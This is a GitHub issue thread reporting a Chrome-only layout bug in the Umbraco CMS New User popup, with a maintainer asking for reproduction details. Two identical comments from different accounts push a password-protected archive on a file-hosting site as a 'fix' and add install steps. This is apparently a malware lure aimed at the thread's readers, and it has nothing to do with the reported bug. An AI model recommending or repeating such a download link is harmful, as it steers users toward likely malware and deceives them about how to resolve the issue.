### ISSUE TITLE
New User popup has unneeded scrollbars/whitespaciing (Chrome)

### ISSUE THREAD

**Issue by Ambertvu** [umbraco/Umbraco-CMS#16971]
### Which Umbraco version are you using? (Please write the *exact* version, example: 10.1.0)

14.3.0-rc.preview.12

### Bug summary

![image](https://github.com/user-attachments/assets/45ad5db0-6d01-4095-a14c-b481673d86a9)

At first it loads fine, but after a tenth of a second the scrollbars appear and whitespace is added as seen in the screenshot

### Specifics

Tried in 
Firefox: No issue
Chrome: Has issue
Edge: No issue
First cleared all files in Staticfiles, then ran npm ci && npm run build:for:cms
All incognito screens

### Steps to reproduce

Go to the Users section
Click the Create button

### Expected result / actual result

The area should not have extra scrollbars/whitespacing

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NguyenThuyLan** [comment]
It's hard to reproduce this issue, I tried on v14.3.0-rc.preview.28, begin from 768 x 1024 but can not reproduce it.
Can you give more specific details?
